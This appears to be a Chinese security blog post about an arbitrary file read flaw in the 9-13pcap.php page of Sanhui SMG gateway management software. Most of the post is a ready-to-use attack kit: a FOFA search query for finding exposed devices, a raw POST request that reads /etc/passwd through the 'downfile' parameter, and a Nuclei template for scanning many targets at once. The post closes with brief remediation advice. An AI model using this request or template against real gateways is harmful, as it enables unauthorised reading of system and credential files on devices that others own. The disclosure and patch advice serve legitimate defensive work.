乐于分享
好东西不私藏

三汇 SMG 网关管理软件 9-13pcap.php 任意文件读取漏洞

三汇 SMG 网关管理软件 9-13pcap.php 任意文件读取漏洞

⚠️ 免责声明: 本文涉及的技术内容仅限用于合法的学习与研究目的。严禁利用文中提供的信息或工具进行任何形式的非法测试。任何因传播或使用相关内容而导致的直接或间接后果与损失,均由使用者自行承担全部责任,与本文作者无关。

🔍 漏洞概述

漏洞的核心在于 9-13pcap.php 文件对用户输入(如文件路径参数)的处理不当,未进行充分的验证和过滤。攻击者可读取系统任意文件内容。

🧪 FOFA 资产发现

body="text ml10 mr20" && (title="网关管理软件" || title="Gateway Management")

💉 漏洞复现

POST /en/9-13pcap.php HTTP/1.1Hosttarget.comContent-Typeapplication/x-www-form-urlencoded; charset=UTF-8down=1&downfile=/etc/passwd

🧬 Nuclei POC —— 一键批量检测

id: sanhuiSMG-9-13pcap_php-File-Readinfo:  name: 三汇 SMG 网关管理软件 9-13pcap.php 任意文件读取漏洞  author: SanqianSec  severity: highhttp:  - raw:      - |        POST /en/9-13pcap.php HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0        Content-Type: application/x-www-form-urlencoded        down=1&downfile=/etc/passwd    matchers-condition: and    matchers:      - type: word        part: body        words:          - 'root:x:'      - type: status        status:           - 200

🛡️ 修复建议

1. 权限最小化:运行 Web 服务的操作系统账户应仅拥有访问必要文件的最小权限,避免使用高权限账户(如 root、Administrator)。

2. 部署 WAF:在应用前端部署 Web 应用防火墙(WAF),配置规则以检测和拦截包含路径遍历特征的恶意请求

3. 更新与补丁:关注软件厂商(三汇)发布的安全公告,及时应用官方提供的安全补丁或升级到修复漏洞的版本。